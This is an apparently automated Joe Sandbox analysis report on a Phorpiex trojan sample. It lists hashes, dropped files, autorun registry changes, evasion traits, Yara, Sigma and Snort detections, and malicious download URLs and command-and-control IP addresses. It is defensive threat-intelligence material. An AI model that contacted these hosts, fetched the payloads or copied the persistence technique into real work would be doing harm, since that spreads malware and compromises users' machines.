Edit tour

Windows Analysis Report
957C4XK6Lt.exe

Overview

General Information

Sample name:	957C4XK6Lt.exe renamed because original name is a hash value
Original sample name:	f33c75710d0e0463a2528e619c2ee382.exe
Analysis ID:	1430850
MD5:	f33c75710d0e0463a2528e619c2ee382
SHA1:	4d2dd071fe274e6a8696448c21eeeecc0cf07e6d
SHA256:	ec7dd08d03d5d4142c82fc04cea7e948d05641b0a3008a0d8a00b0421b5b04f9
Tags:	32exetrojan
Infos:

Detection

Phorpiex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Phorpiex

Changes security center settings (notifications, updates, antivirus, firewall)

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to check if Internet connection is working

Contains functionality to detect sleep reduction / modifications

Drops PE files to the user root directory

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Abnormal high CPU Usage

Connects to several IPs in different countries

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

957C4XK6Lt.exe (PID: 3748 cmdline: "C:\Users\user\Desktop\957C4XK6Lt.exe" MD5: F33C75710D0E0463A2528E619C2EE382)

135143440.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\135143440.exe MD5: 36010B83BCCFCD1032971DF9FC5082A1)

1682018248.exe (PID: 6528 cmdline: C:\Users\user\AppData\Local\Temp\1682018248.exe MD5: CD1D9C0ED8763E6BB3EE7EFB133DC60E)

sysvratrel.exe (PID: 5676 cmdline: "C:\Users\user\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)

sysvratrel.exe (PID: 2012 cmdline: "C:\Windows\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)

sysvratrel.exe (PID: 6196 cmdline: "C:\Users\user\sysvratrel.exe" MD5: 36010B83BCCFCD1032971DF9FC5082A1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Phorpiex	Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.	No Attribution	https://bin.re/blog/phorpiex/ https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html https://research.checkpoint.com/2019/phorpiex-breakdown/ https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/	https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\sysvratrel.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\sysvratrel.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Temp\1682018248.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Temp\135143440.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: 135143440.exe PID: 6684	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysvratrel.exe PID: 5676	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: 1682018248.exe PID: 6528	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysvratrel.exe PID: 2012	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysvratrel.exe PID: 6196	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
7.0.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
6.2.1682018248.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
8.2.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
7.2.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
8.0.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
6.0.1682018248.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
3.2.135143440.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
5.0.sysvratrel.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
3.0.135143440.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Click to see the 5 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\sysvratrel.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\135143440.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysvratrel.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\135143440.exe, ProcessId: 6684, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Snort Signatures

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 212.112.112.84

Timestamp:	04/24/24-10:09:33.285933
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 186.94.185.219

Timestamp:	04/24/24-10:07:51.958250
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Phorpiex Domain in DNS Lookup - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	04/24/24-10:06:57.287872
SID:	2856563
Source Port:	59936
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 92.46.174.254

Timestamp:	04/24/24-10:10:13.394595
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 217.20.222.188

Timestamp:	04/24/24-10:08:32.035369
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 120.237.99.181

Timestamp:	04/24/24-10:07:11.867133
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 46.35.86.48

Timestamp:	04/24/24-10:09:58.363225
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 89.219.115.32

Timestamp:	04/24/24-10:09:23.285105
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 181.114.188.143

Timestamp:	04/24/24-10:09:48.347692
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 95.71.69.217

Timestamp:	04/24/24-10:07:31.911742
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 39.53.75.107

Timestamp:	04/24/24-10:08:11.988207
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 89.236.226.70

Timestamp:	04/24/24-10:09:53.363437
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 2.180.157.70

Timestamp:	04/24/24-10:07:46.957752
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 151.233.73.168

Timestamp:	04/24/24-10:09:18.287284
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 197.148.34.173

Timestamp:	04/24/24-10:07:56.957867
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 82.114.186.50

Timestamp:	04/24/24-10:07:26.909948
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 41.102.227.47

Timestamp:	04/24/24-10:08:48.239817
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 5.200.190.214

Timestamp:	04/24/24-10:08:01.978212
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 5.200.152.6

Timestamp:	04/24/24-10:07:21.863771
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 2.191.221.216

Timestamp:	04/24/24-10:10:48.476371
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 189.158.148.85

Timestamp:	04/24/24-10:10:53.507363
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 134.35.81.188

Timestamp:	04/24/24-10:10:43.459613
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 31.186.49.163

Timestamp:	04/24/24-10:10:18.414506
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 2.185.146.181

Timestamp:	04/24/24-10:08:58.253867
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 5.251.56.144

Timestamp:	04/24/24-10:10:23.425986
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 85.113.19.18

Timestamp:	04/24/24-10:07:16.864431
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 2.190.224.61

Timestamp:	04/24/24-10:10:03.378900
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 91.234.219.185

Timestamp:	04/24/24-10:08:43.222645
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 134.35.74.170

Timestamp:	04/24/24-10:08:53.254442
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 5.233.222.244

Timestamp:	04/24/24-10:10:33.442451
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 95.58.18.206

Timestamp:	04/24/24-10:08:22.004023
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 128.65.176.18

Timestamp:	04/24/24-10:09:28.285044
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 92.47.124.54

Timestamp:	04/24/24-10:09:43.348638
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 134.35.163.241

Timestamp:	04/24/24-10:10:58.504112
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 134.35.173.140

Timestamp:	04/24/24-10:10:28.442260
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 37.20.161.137

Timestamp:	04/24/24-10:09:13.269540
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 36.20.68.95

Timestamp:	04/24/24-10:07:41.942141
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 31.186.54.5

Timestamp:	04/24/24-10:08:27.019326
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 89.218.235.182

Timestamp:	04/24/24-10:08:16.989023
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC - Source IP: 192.168.2.6 - Destination IP: 82.194.11.2

Timestamp:	04/24/24-10:09:03.253978
SID:	2044077
Source Port:	59141
Destination Port:	40500
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://twizt.net/pei	Avira URL Cloud: Label: malware
Source: http://twizt.net/new	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1D	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/383(	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php5%z	Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.z%	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpb	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpshqos.dll.muiS9	Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exeP0S	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1~	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpm%	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/5	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/4	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/3	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/6	Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php%temp%%s	Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exeP0	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpystem32	Avira URL Cloud: Label: malware
Source: http://twizt.net/=	Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exe	Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\sysvratrel.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\sysvratrel.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1315882

Multi AV Scanner detection for domain / URL

Source: twizt.net	Virustotal: Detection: 21%	Perma Link
Source: http://91.202.233.141/	Virustotal: Detection: 8%	Perma Link
Source: http://twizt.net/pei	Virustotal: Detection: 14%	Perma Link
Source: http://twizt.net/new	Virustotal: Detection: 14%	Perma Link
Source: http://185.215.113.66/1D	Virustotal: Detection: 17%	Perma Link
Source: http://91.202.233.141/5	Virustotal: Detection: 5%	Perma Link
Source: http://91.202.233.141/6	Virustotal: Detection: 5%	Perma Link
Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user	Virustotal: Detection: 16%	Perma Link
Source: http://91.202.233.141/4	Virustotal: Detection: 5%	Perma Link
Source: http://twizt.net/peinstall.phpb	Virustotal: Detection: 14%	Perma Link
Source: http://185.215.113.66/1~	Virustotal: Detection: 15%	Perma Link
Source: http://185.215.113.66/	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.66/5	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.66/4	Virustotal: Detection: 18%	Perma Link
Source: http://193.233.132.177/	Virustotal: Detection: 7%	Perma Link
Source: http://185.215.113.66/3	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.66/2	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\sysvratrel.exe	ReversingLabs: Detection: 64%
Source: C:\Windows\sysvratrel.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Source: 957C4XK6Lt.exe	ReversingLabs: Detection: 68%
Source: 957C4XK6Lt.exe	Virustotal: Detection: 55%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Joe Sandbox ML: detected
Source: C:\Users\user\sysvratrel.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Joe Sandbox ML: detected
Source: C:\Users\user\sysvratrel.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 957C4XK6Lt.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	3_2_0040C0C0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	5_2_0040C0C0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	8_2_0040C0C0

Phishing

Yara detected Phorpiex

Source: Yara match	File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED

Source: 957C4XK6Lt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: 957C4XK6Lt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

